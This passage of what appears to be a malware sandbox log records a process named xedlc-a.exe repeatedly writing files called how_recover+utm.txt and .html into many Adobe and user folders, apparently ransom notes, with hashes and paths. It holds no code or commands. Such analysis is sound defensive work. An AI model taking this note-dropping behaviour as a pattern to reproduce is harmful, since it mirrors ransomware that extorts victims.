- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 91990
- mode: close
- sequenceNumber: 1642
- value: C:\Documents and Settings\admin\Favorites\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778460
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 91997
- mode: created
- sequenceNumber: 1643
- value: C:\Documents and Settings\admin\IETldCache\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778461
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92004
- mode: close
- sequenceNumber: 1644
- value: C:\Documents and Settings\admin\IETldCache\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778461
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92190
- mode: created
- sequenceNumber: 1645
- value: C:\Documents and Settings\admin\IETldCache\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778462
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92197
- mode: close
- sequenceNumber: 1646
- value: C:\Documents and Settings\admin\IETldCache\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778462
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92283
- mode: created
- sequenceNumber: 1647
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\10.0\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778463
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92289
- mode: close
- sequenceNumber: 1648
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\10.0\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778463
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92411
- mode: created
- sequenceNumber: 1649
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\10.0\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778464
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92417
- mode: close
- sequenceNumber: 1650
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\10.0\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778464
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92496
- mode: created
- sequenceNumber: 1651
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\11.0\Cache\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778465
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92502
- mode: close
- sequenceNumber: 1652
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\11.0\Cache\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778465
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92582
- mode: created
- sequenceNumber: 1653
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\11.0\Cache\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778466
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92589
- mode: close
- sequenceNumber: 1654
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\11.0\Cache\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778466
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92596
- mode: created
- sequenceNumber: 1655
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\11.0\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778467
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92602
- mode: close
- sequenceNumber: 1656
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\11.0\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778467
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92609
- mode: created
- sequenceNumber: 1657
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\11.0\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778468
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92615
- mode: close
- sequenceNumber: 1658
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\11.0\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778468
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92624
- mode: created
- sequenceNumber: 1659
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778469
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92632
- mode: close
- sequenceNumber: 1660
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778469
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92728
- mode: created
- sequenceNumber: 1661
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778470
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92735
- mode: close
- sequenceNumber: 1662
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778470
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92742
- mode: created
- sequenceNumber: 1663
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\7.0\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778471
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92748
- mode: close
- sequenceNumber: 1664
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\7.0\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778471
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92757
- mode: created
- sequenceNumber: 1665
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\7.0\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778472
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92765
- mode: close
- sequenceNumber: 1666
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\7.0\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778472
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92778
- mode: created
- sequenceNumber: 1667
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\Cache\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778473
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92786
- mode: close
- sequenceNumber: 1668
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\Cache\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778473
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92815
- mode: created
- sequenceNumber: 1669
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\Cache\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778474
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92822
- mode: close
- sequenceNumber: 1670
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\Cache\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778474
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92833
- mode: created
- sequenceNumber: 1671
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778475
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92841
- mode: close
- sequenceNumber: 1672
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778475
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92850
- mode: created
- sequenceNumber: 1673
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778476
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92856
- mode: close
- sequenceNumber: 1674
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778476
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92870
- mode: created
- sequenceNumber: 1675
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778477
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92876
- mode: close
- sequenceNumber: 1676
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778477
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92884
- mode: created
- sequenceNumber: 1677
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778478
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92890
- mode: close
- sequenceNumber: 1678
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778478
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92899
- mode: created
- sequenceNumber: 1679
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778479
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92905
- mode: close
- sequenceNumber: 1680
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778479
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92951
- mode: created
- sequenceNumber: 1681
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778480
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92957
- mode: close
- sequenceNumber: 1682
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778480
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92966
- mode: created
- sequenceNumber: 1683
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778481
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92973
- mode: close
- sequenceNumber: 1684
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778481
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92980
- mode: created
- sequenceNumber: 1685
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778482
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 92986
- mode: close
- sequenceNumber: 1686
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778482
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 92994
- mode: created
- sequenceNumber: 1687
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778483
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 93000
- mode: close
- sequenceNumber: 1688
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778483
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 93046
- mode: created
- sequenceNumber: 1689
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778484
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 93053
- mode: close
- sequenceNumber: 1690
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778484
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 93133
- mode: created
- sequenceNumber: 1691
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778485
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 93139
- mode: close
- sequenceNumber: 1692
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778485
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 93147
- mode: created
- sequenceNumber: 1693
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778486
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 93153
- mode: close
- sequenceNumber: 1694
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778486
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 93228
- mode: created
- sequenceNumber: 1695
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Color\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778487
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 93234
- mode: close
- sequenceNumber: 1696
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Color\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778487
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 93274
- mode: created
- sequenceNumber: 1697
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Color\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778488
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 93281
- mode: close
- sequenceNumber: 1698
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Color\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778488
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 93291
- mode: created
- sequenceNumber: 1699
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Updater6\Install\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778489
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 93298
- mode: close
- sequenceNumber: 1700
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Updater6\Install\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778489
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 93306
- mode: created
- sequenceNumber: 1701
- value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Updater6\Install\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778490
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 93313
- mode: close
- sequenceNumber: 1702
